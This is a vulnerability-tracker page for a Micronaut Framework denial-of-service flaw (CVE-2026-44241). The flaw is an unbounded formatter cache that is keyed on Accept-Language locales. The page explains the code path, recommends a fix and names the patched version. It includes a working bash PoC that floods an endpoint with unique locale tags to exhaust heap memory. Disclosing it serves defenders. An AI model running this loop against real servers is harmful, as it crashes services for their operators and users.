Java
CVE-2026-44241
HIGH
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Primary rating from Vendor (https://github.com/micronaut-projects/micronaut-core) · only source for this CVE.
CVSS VectorVendor: https://github.com/micronaut-projects/micronaut-core
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
3Blast Radius
ecosystem impact- 56 maven packages depend on io.micronaut:micronaut-context (13 direct, 43 indirect)
Ecosystem-wide dependent count for version 4.3.0.
DescriptionCVE.org
Summary
TimeConverterRegistrar caches DateTimeFormatter instances in an unbounded ConcurrentHashMap<String, DateTimeFormatter> whose key is derived from the @Format annotation pattern concatenated with the locale from the HTTP Accept-Language header. Because Locale.forLanguageTag() accepts arbitrary BCP 47 private-use extensions (en-x-a001, en-x-a002, …), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This is structurally identical to the recently patched GHSA-2hcp-gjrf-7fhc (DefaultHtmlErrorResponseBodyProvider), but TimeConverterRegistrar.formattersCache was not covered by that fix.
Details
The vulnerable cache is declared in context/src/main/java/io/micronaut/runtime/converters/time/TimeConverterRegistrar.java at line 123:
// TimeConverterRegistrar.java:123
private final Map<String, DateTimeFormatter> formattersCache = new ConcurrentHashMap<>();The getFormatter method at line 434 inserts into this map with no eviction or size limit:
// TimeConverterRegistrar.java:434-443
private DateTimeFormatter getFormatter(String pattern, ConversionContext context) {
var key = pattern + context.getLocale(); // locale from Accept-Language header
var cachedFormatter = formattersCache.get(key);
if (cachedFormatter != null) {
return cachedFormatter;
}
var formatter = DateTimeFormatter.ofPattern(pattern, context.getLocale());
formattersCache.put(key, formatter); // NO SIZE CHECK - unbounded growth
return formatter;
}The attacker-controlled locale flows into the cache key through this call chain:
- HTTP header parsed -
HttpHeaders.findAcceptLanguage()athttp/src/main/java/io/micronaut/http/HttpHeaders.java:766-771callsLocale.forLanguageTag(part)directly on the rawAccept-Languagevalue:
// HttpHeaders.java:766-771
default Optional<Locale> findAcceptLanguage() {
return findFirst(HttpHeaders.ACCEPT_LANGUAGE)
.map(text -> {
String part = HttpHeadersUtil.splitAcceptHeader(text);
return part == null ? Locale.getDefault() : Locale.forLanguageTag(part);
});
}- Locale planted in ConversionContext -
AbstractRouteMatch.newContext()atrouter/src/main/java/io/micronaut/web/router/AbstractRouteMatch.java:373-378passes the request locale into the conversion context for every route argument binding:
// AbstractRouteMatch.java:373-378
private <E> ArgumentConversionContext<E> newContext(Argument<E> argument, HttpRequest<?> request) {
return ConversionContext.of(
argument,
request.getLocale().orElse(null), // ← attacker-controlled via Accept-Language
request.getCharacterEncoding()
);
}- Unbounded cache insert - When any temporal argument annotated with
@Formatis bound,TimeConverterRegistrar.getFormatter(pattern, context)is called and inserts a newDateTimeFormatterfor each uniquepattern + localekey.
This path is triggered for any route endpoint with a @Format-annotated temporal parameter. This is an officially documented and commonly used Micronaut pattern, demonstrated in the framework's own test suite:
// test-suite/.../BindingController.java:105 (official Micronaut example)
@Get("/dateFormat")
public String dateFormat(@Format("dd/MM/yyyy hh:mm:ss a z") @Header ZonedDateTime date) {
return date.toString();
}TimeConverterRegistrar is an @Internal core bean registered unconditionally in every Micronaut application - it is not optional or user-configured. By contrast, the DefaultHtmlErrorResponseBodyProvider cache patched in GHSA-2hcp-gjrf-7fhc now uses a ConcurrentLinkedHashMap bounded at 100 entries; TimeConverterRegistrar.formattersCache remains an unbounded plain ConcurrentHashMap.
PoC
Against any Micronaut application exposing an endpoint with a @Format-annotated temporal parameter:
# Flood the formattersCache with unique locale-derived keys
for i in $(seq 1 200000); do
curl -s -o /dev/null \
-H "Accept-Language: en-x-$(printf '%06d' $i)" \
-H "date: 01/01/2024 12:00:00 AM UTC" \
"http://localhost:8080/dateFormat" &
# Throttle to avoid socket exhaustion
[ $((i % 500)) -eq 0 ] && wait
done
wait
# Server will throw OutOfMemoryError after enough unique locale entries accumulateEach request with a novel en-x-XXXXXX private-use tag inserts a new DateTimeFormatter entry into the unbounded map. Each DateTimeFormatter (with locale metadata) occupies roughly 2-10 KB on the heap. At 100,000 unique entries, the map alone can consume ~500 MB; at 500,000 entries the JVM typically crashes with OutOfMemoryError: Java heap space.
Impact
- An unauthenticated attacker can crash any Micronaut server that exposes at least one endpoint with a
@Format-annotated temporal type parameter - a documented, first-class framework feature. - Memory grows linearly with the number of unique
Accept-Languagevalues sent. The BCP 47 private-use namespace (en-x-ANYTHING) provides millions of distinct valid locale strings. - No credentials, special permissions, or exploitation of application logic are required - only the ability to send HTTP requests with custom headers.
TimeConverterRegistraris active in all Micronaut HTTP server applications by default; no special configuration is needed to be vulnerable.
Recommended Fix
Apply the same fix pattern used for GHSA-2hcp-gjrf-7fhc: replace the unbounded ConcurrentHashMap with a bounded ConcurrentLinkedHashMap:
// In TimeConverterRegistrar.java - replace line 123
import io.micronaut.core.util.clhm.ConcurrentLinkedHashMap;
private static final int MAX_FORMATTERS_CACHE_SIZE = 100;
private final Map<String, DateTimeFormatter> formattersCache =
new ConcurrentLinkedHashMap.Builder<String, DateTimeFormatter>()
.maximumWeightedCapacity(MAX_FORMATTERS_CACHE_SIZE)
.build();Alternatively, since @Format pattern values come from static annotations (a bounded, compile-time set), the locale should be excluded from the cache key and applied at use-time instead:
// In getFormatter() - cache only by pattern, apply locale at use-time
private DateTimeFormatter getFormatter(String pattern, ConversionContext context) {
DateTimeFormatter base = formattersCache.computeIfAbsent(
pattern, p -> DateTimeFormatter.ofPattern(p)
);
Locale locale = context.getLocale();
return locale != null ? base.withLocale(locale) : base;
}This second approach bounds the cache by the number of distinct @Format patterns in the application, which is always small and finite, fully eliminating the attack surface.
AnalysisAI
Unauthenticated remote denial-of-service in Micronaut Framework 4.3.0–4.10.21 allows heap exhaustion via crafted Accept-Language headers. The TimeConverterRegistrar component caches DateTimeFormatter instances in an unbounded ConcurrentHashMap keyed by @Format pattern plus locale. Attackers exploit BCP 47 private-use extensions (e.g., en-x-0001, en-x-0002) to generate millions of unique cache entries, consuming 500+ MB per 100,000 requests until JVM crashes with OutOfMemoryError. Publicly available exploit code exists (PoC provided in advisory). EPSS score not yet available for this 2026 CVE. Affects all Micronaut HTTP servers using documented @Format temporal parameter binding—a first-class framework feature requiring no special configuration. Vendor-released patch: 4.10.22 fixes both this and sibling vulnerability GHSA-3rfq-4wpf-qqw3 in ResourceBundleMessageSource. Structurally identical to previously patched GHSA-2hcp-gjrf-7fhc but in different component.
Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m
Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti
Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent
Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug
JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up
Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up
The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow
Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla
The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during
Same weakness CWE-400 – Uncontrolled Resource Consumption
View allSame technique Denial Of Service
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-8hjv-92q9-g4xj